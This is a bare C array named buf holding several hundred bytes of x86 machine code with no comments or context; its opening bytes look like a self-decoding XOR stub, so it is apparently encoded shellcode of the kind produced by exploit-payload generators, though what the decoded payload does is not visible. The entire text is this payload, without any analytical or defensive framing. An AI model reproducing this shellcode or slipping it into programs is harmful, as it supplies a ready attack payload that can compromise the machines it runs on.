unsigned char buf[] = 
"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xdc\xb0\xb9\xd6\x83\xee\xfc\xe2\xf4\x20\x58\x3b\xd6"
"\xdc\xb0\xd9\x5f\x39\x81\x79\xb2\x57\xe0\x89\x5d\x8e\xbc"
"\x32\x84\xc8\x3b\xcb\xfe\xd3\x07\xf3\xf0\xed\x4f\x15\xea"
"\xbd\xcc\xbb\xfa\xfc\x71\x76\xdb\xdd\x77\x5b\x24\x8e\xe7"
"\x32\x84\xcc\x3b\xf3\xea\x57\xfc\xa8\xae\x3f\xf8\xb8\x07"
"\x8d\x3b\xe0\xf6\xdd\x63\x32\x9f\xc4\x53\x83\x9f\x57\x84"
"\x32\xd7\x0a\x81\x46\x7a\x1d\x7f\xb4\xd7\x1b\x88\x59\xa3"
"\x2a\xb3\xc4\x2e\xe7\xcd\x9d\xa3\x38\xe8\x32\x8e\xf8\xb1"
"\x6a\xb0\x57\xbc\xf2\x5d\x84\xac\xb8\x05\x57\xb4\x32\xd7"
"\x0c\x39\xfd\xf2\xf8\xeb\xe2\xb7\x85\xea\xe8\x29\x3c\xef"
"\xe6\x8c\x57\xa2\x52\x5b\x81\xd8\x8a\xe4\xdc\xb0\xd1\xa1"
"\xaf\x82\xe6\x82\xb4\xfc\xce\xf0\xdb\x4f\x6c\x6e\x4c\xb1"
"\xb9\xd6\xf5\x74\xed\x86\xb4\x99\x39\xbd\xdc\x4f\x6c\x86"
"\x8c\xe0\xe9\x96\x8c\xf0\xe9\xbe\x36\xbf\x66\x36\x23\x65"
"\x2e\xbc\xd9\xd8\x79\x7e\xce\x88\xd1\xd4\xdc\xa1\x89\x5f"
"\x3a\xda\xa9\x80\x8b\xd8\x20\x73\xa8\xd1\x46\x03\x59\x70"
"\xcd\xda\x23\xfe\xb1\xa3\x30\xd8\x49\x63\x7e\xe6\x46\x03"
"\xb4\xd3\xd4\xb2\xdc\x39\x5a\x81\x8b\xe7\x88\x20\xb6\xa2"
"\xe0\x80\x3e\x4d\xdf\x11\x98\x94\x85\xd7\xdd\x3d\xfd\xf2"
"\xcc\x76\xb9\x92\x88\xe0\xef\x80\x8a\xf6\xef\x98\x8a\xe6"
"\xea\x80\xb4\xc9\x75\xe9\x5a\x4f\x6c\x5f\x3c\xfe\xef\x90"
"\x23\x80\xd1\xde\x5b\xad\xd9\x29\x09\x0b\x59\xcb\xf6\xba"
"\xd1\x70\x49\x0d\x24\x29\x09\x8c\xbf\xaa\xd6\x30\x42\x36"
"\xa9\xb5\x02\x91\xcf\xc2\xd6\xbc\xdc\xe3\x46\x03";
